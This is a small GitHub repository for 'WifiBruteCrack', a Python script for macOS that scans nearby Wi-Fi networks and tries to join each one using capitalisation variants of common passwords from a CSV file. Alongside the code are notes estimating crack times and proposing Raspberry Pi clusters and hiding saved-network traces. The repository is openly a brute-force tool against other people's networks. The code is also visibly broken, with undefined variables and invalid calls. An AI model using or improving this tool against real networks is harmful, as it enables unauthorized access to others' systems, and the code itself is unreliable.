├── README.md
├── .gitignore
├── LICENSE
├── resources
└── wifi_brute_crack.py


/README.md:
--------------------------------------------------------------------------------
1 | WifiBruteCrack
2 | ==============
3 | 
4 | Python script to attempt to brute force all wifi networks in range of a device, and return a possible set of networks to connect to and the password,
5 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
 1 | *.py[cod]
 2 | 
 3 | # C extensions
 4 | *.so
 5 | 
 6 | # Packages
 7 | *.egg
 8 | *.egg-info
 9 | dist
10 | build
11 | eggs
12 | parts
13 | bin
14 | var
15 | sdist
16 | develop-eggs
17 | .installed.cfg
18 | lib
19 | lib64
20 | 
21 | # Installer logs
22 | pip-log.txt
23 | 
24 | # Unit test / coverage reports
25 | .coverage
26 | .tox
27 | nosetests.xml
28 | 
29 | # Translations
30 | *.mo
31 | 
32 | # Mr Developer
33 | .mr.developer.cfg
34 | .project
35 | .pydevproject
36 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | The MIT License (MIT)
 2 | 
 3 | Copyright (c) 2013 Cinque McFarlane-Blake
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy of
 6 | this software and associated documentation files (the "Software"), to deal in
 7 | the Software without restriction, including without limitation the rights to
 8 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
 9 | the Software, and to permit persons to whom the Software is furnished to do so,
10 | subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
17 | FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
18 | COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
19 | IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
20 | CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
21 | 


--------------------------------------------------------------------------------
/resources:
--------------------------------------------------------------------------------
 1 | //Make link between source file and target file
 2 | //sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport
 3 | 
 4 | 
 5 | //Command when launching
 6 | //airport -s
 7 | //store in memory
 8 | 
 9 | 
10 | //use paswords.csv avec import os, csv, sys
11 | //store in memory
12 | 
13 | //Command to login to netowrk
14 | //networksetup -setairportnetwork Airport [router SSID] [password]
15 | 
16 | 
17 | //add on start up, or run during an specified interval to maintain connection in motion thru dense airways
18 | 
19 | //command to not save network if succesful conneciton
20 | //airport prefs RememberRecentNetworks=NO
21 | 
22 | //command to run at complete of script
23 | //airport prefs RememberRecentNetworks=YES
24 | 
25 | //(1 password *7 seconds *5 combos *x neworks)/60 seconds
26 | //or  (1 password *7 seconds *5 combos)/60 seconds and x networks conncurently
27 | 
28 | //8 top frequent passwords (~%14) from file per ~min over all networks n, if n is within thread/memory limit per cpu.
29 | //100 top frequent ppasswords (~%40) from file per ~12.5 min over all networks n, if n is within thread/memory limit per cpu.
30 | //1,000 top frequent ppasswords (~%91) from file per ~125 min over all networks n, if n is within thread/memory limit per cpu.
31 | //10,000 top frequent ppasswords(~%99.8) from file per ~1,250 min (~20.9 hours) over all networks n, if n is within thread/memory limit per cpu.
32 | //with 21 rasberrypi's (1 master , 21 slaves) means ~3 secs for top 8, ~38 seconds for top 100, ~6.25 min for top 1,000, ~62.5 min for top 10,000
33 | 
34 | //C wrapper to run multiple threads (python maganer to imort xml, then launch thread for each network concurrently)?
35 | //python manager to import xml, and run mupiple threads?
36 | // try to connect different networks at same time with same passwords to cut by multiple of pass combo and networks in range?
37 | 


--------------------------------------------------------------------------------
/wifi_brute_crack.py:
--------------------------------------------------------------------------------
  1 | import os, sys, csv
  2 | from subprocess import call, check_output, CalledProcessError, Popen
  3 | import xml.etree.ElementTree as ET
  4 | 
  5 | 
  6 | PASSWORDS = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'password.csv')
  7 | 
  8 | def get_network_list():
  9 | 	#execute command to get nearby network list in xml:
 10 | 	net_list_comm = '/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s -x'
 11 | 	net_list_xml = check_output(net_list_comm, shell=True)
 12 | 	root = ET.fromstring(net_list_xml)
 13 | 
 14 | 	#numbers of netowrks
 15 | 	_ssids = []
 16 | 	num_net = len(root[0][0])
 17 | 	net_array = []
 18 | 	net_names = []
 19 | 	for i in range(0,num_net):
 20 | 		#ssid, name of ssid
 21 | 		_ssid = root[0][0][i][7].text
 22 | 		_ssid_name = root[0][0][i][32].text
 23 | 		_ssids.append(_ssid)
 24 | 		net_names.append(_ssid_name)
 25 | 
 26 | 	net_array.append(num_net,_ssids,net_names)
 27 | 	return net_array
 28 | 
 29 | def _sanitize_field(node):
 30 | 	if node:
 31 | 		return node.replace("'", "\'")
 32 | 	else:
 33 | 		return node
 34 | 	return node
 35 | 
 36 | def get_password_array(password):
 37 | 	password_data = []
 38 | 	pass_array = []
 39 | 	#all lower
 40 | 	alllow_pass = password
 41 | 	pass_array.append(alllow_pass)
 42 | 	#all upper
 43 | 	allup_pass = _pass.upper()
 44 | 	pass_array.append(allup_pass)
 45 | 	#first upper
 46 | 	fup_pass = "".join(c.upper() if i in set([0]) else c for i, c in enumerate(_pass))
 47 | 	pass_array.append(fup_pass)
 48 | 	#every other lower
 49 | 	eol_pass = "".join(c.lower() if i % 2 == 0  else c for i, c in enumerate(_pass))
 50 | 	pass_array.append(eol_pass)
 51 | 	#every other upper
 52 | 	eou_pass = "".join(c.upper() if i % 2 == 0  else c for i, c in enumerate(_pass))
 53 | 	pass_array.append(eou_pass)
 54 | 
 55 | 	password_data.append(len(pass_array))
 56 | 	password_data.append(pass_array)
 57 | 	return password_data
 58 | 
 59 | 
 60 | def process_element(itera,elem,networks):
 61 | 	net_size = net_array[0]
 62 | 	net_data = net_array[1]
 63 | 	net_names_array = net_array[2]
 64 | 	_freq = _sanitize_field(elem[1])
 65 | 	_password = _sanitize_field(elem[0])
 66 | 
 67 | 	passwords = get_password_array(_password)
 68 | 
 69 | 	for i in range(0,net_size):
 70 | 		for j in range(0,passwords[0]):
 71 | 			#execute command to login to netowrk, find out how long this process is, this will be the benchmark point/bottleneck (can  run concurently?)
 72 | 			# ~6-7 seconds for succesful connect? bail out after that.
 73 | 			# 5.8 min to run through 10 passwords from file in combination (50 passwords)
 74 | 			#if one can launch multiple processess (x), 5.8 min to run through 10 * x passwords from file in combination (50 * x) 
 75 | 			try:
 76 | 				net_con = 'networksetup -setairportnetwork Airport %s %s' % (net_names_array[i],passwords[1][j])
 77 | 				#or use call to check state or use popen to kill after 7 seconds
 78 | 				#ouput = Popen(net_con, shell=True)
 79 | 				#ouput.kill()
 80 | 
 81 | 				#call(net_con, shell=True)
 82 | 				output = check_output(net_con, shell=True)
 83 | 			except CalledProcessError:
 84 | 				continue
 85 | 
 86 | 			if output:
 87 | 				#if connection is succesful
 88 | 				print 'Network Name: %s\n Network SSID: %s\n Network Password: %s\n' % (net_names_array[i],net_data[i],alllow_pass)
 89 | 				sys.exit()
 90 | 	
 91 | 
 92 | #get network array (size of list, list)
 93 | network_data = get_network_list()
 94 | 
 95 | 
 96 | with open(PASSWORDS, 'rU') as f:
 97 | 	#filtered = (l.replace('\n', '') for l in f)
 98 | 	reader = csv.reader(f)
 99 | 	for i, line in enumerate(reader):
100 | 		#print line
101 | 		process_element(i,line,net_array)


--------------------------------------------------------------------------------